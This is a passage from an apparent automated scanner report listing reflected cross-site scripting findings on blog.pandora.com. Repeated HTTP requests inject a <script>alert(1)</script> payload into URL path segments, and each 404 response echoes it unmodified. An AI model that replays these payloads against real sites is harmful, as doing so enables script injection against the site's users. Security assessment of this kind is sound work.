User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7363<script>alert(1)</script>be446c1f728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b38<script>alert(1)</script>f1ed4fecb73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a14db<script>alert(1)</script>9908a654cd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cece<script>alert(1)</script>58d715564b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70673<script>alert(1)</script>a0d7ecee19d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload de711<script>alert(1)</script>23fb059918f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 338e6<script>alert(1)</script>4ab9dcf9e4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 753ff<script>alert(1)</script>0065a69c7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97d30<script>alert(1)</script>d935da65367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f622<script>alert(1)</script>04772bbc023 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33fe0<script>alert(1)</script>cbd4cc45e8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3aeb2<script>alert(1)</script>3e9b7737a01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad877<script>alert(1)</script>2e63fd05877 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bf6f<script>alert(1)</script>8d5991e8eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31bd3<script>alert(1)</script>2c5162fd032 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2610<script>alert(1)</script>d78d8cd256a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab2610<script>alert(1)</script>d78d8cd256a/archives/north-dakota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5acb9<script>alert(1)</script>15a4ca42e12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5acb9<script>alert(1)</script>15a4ca42e12/north-dakota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e83f5<script>alert(1)</script>eae0ddbe282 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0dd2<script>alert(1)</script>e2bfea7bc51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
